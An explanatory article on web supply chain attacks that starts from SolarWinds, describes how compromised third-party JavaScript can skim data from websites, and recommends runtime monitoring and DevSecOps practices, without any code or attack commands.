The SolarWinds attack continues to send ripples across the world of cybersecurity. For the uninitiated, this form of cyber attack was like a gradual spread of poison, and its fallout proved to be massive – starting with national (US) security concerns that Russia might have been involved and ending up with President Biden issuing an Executive Order on improving the nation’s cybersecurity, followed closely by similar efforts by the UK government.
Whether or not it was a state-sponsored venture, this attack proved to be a huge wake-up call and shone a spotlight on software supply chain attacks. This has become particularly significant given that threat actors have quickly adapted this same approach to other supply chains.
Indeed, it seems that they might have found the holy grail by targeting companies with a strong web presence. Hence the emergence of one of the key growing attack vectors in 2021: the “web supply chain attack”.
The what?
Let’s start from the beginning, and that means looking at the dominance of JavaScript across the web. JavaScript is the “language” of the web. It is estimated that 97% of the world’s websites use JavaScript—including the websites of all Fortune 500 companies.
Twenty years ago, the web mostly consisted of static websites with little to no functionality – but that quickly changed. Ever since the JavaScript open-source community began to assert itself back in 2009, we witnessed an explosion of open-source projects, with the community releasing millions of reusable code pieces (modules or packages) that could be easily shared by different projects. The subsequent development of this ecosystem increased the speed of development for all apps – web, mobile and desktop.
In such a hot space, companies sought to cut product development time by relying on peer-reviewed, third-party modules instead of developing every piece of code in-house. And so, the use of third-party code became standard in web development.
Meanwhile, the web was becoming more valuable and complex. Static websites turned into dynamic pages, culminating in today’s full-fledged digital services like online banking, e-commerce, and streaming. This quick shift was also driven by a growing supply chain of digital services for marketing, UX, and business tools. Instead of implementing their own chatbot, analytics or CRM tools, companies purchased these services from third parties and integrated them directly into their websites.
It’s no wonder, then, that over two-thirds of all the code running on the average website today comes from third parties. And here is where security concerns arise. In the context of a website, every single piece of third-party code has the exact same permissions as any remaining code that was developed internally. So, if a chatbot tool suddenly decides to start capturing and leaking the credit card information of shoppers to an e-commerce site, there is nothing to stop it. This is the essence of a web supply chain attack – breaching a third-party service provider, injecting malicious code into the actual service and, as a result, spreading it to every website that uses it.
Not only do companies have no control over this, but they also have no actual visibility over these attacks. That’s why attacks like Magecart often remain active for months on end.
Best defence?
The UK’s National Cyber Security centre offers some useful advice when it comes to assessing supply chain security and assessing supply chain management practice. Indeed, they provide information on a series of 12 principles, designed to help organizations establish effective control and oversight of their supply chains. It’s a useful starting point but dealing with web supply chain attacks requires an in-depth look at third-party code usage.
Third-party code is here to stay. It is embedded in the core fabric of web development and remains one of the most valuable assets for competitive product development. However, it is possible to alleviate the risks inherent within externally sourced code if companies learn how to safely integrate it. This would require security and development teams to reduce code dependencies wherever possible and implement technology to provide them with visibility and control over the behavior of all code running on the client-side of their websites (i.e., everything that takes place on the browser or end-user device).
This is key if companies are to regain control over their web supply chain. And to maximize levels of security, then companies need to do it continuously at runtime, monitoring every user session for signs of malicious behavior.
This underpins the thinking behind DevSecOps – a real paradigm shift in the software industry that seeks to robustly integrate security into modern app development and deployment. As part of a global push toward more secure supply chains, DevSecOps can ingrain security controls throughout the entire software development lifecycle. These practices can certainly help businesses to regain the visibility and control over their website supply chains that we have already touched upon.
The SolarWinds supply chain attack certainly ruffled a lot of important feathers. On the flip side, it has brought global awareness and the first signs of action against what may become one of the key cyber threats of the decade. Today, we’re at a key moment in time where preventing these attacks is within reach, while the cost of failing to do so is too high to ignore.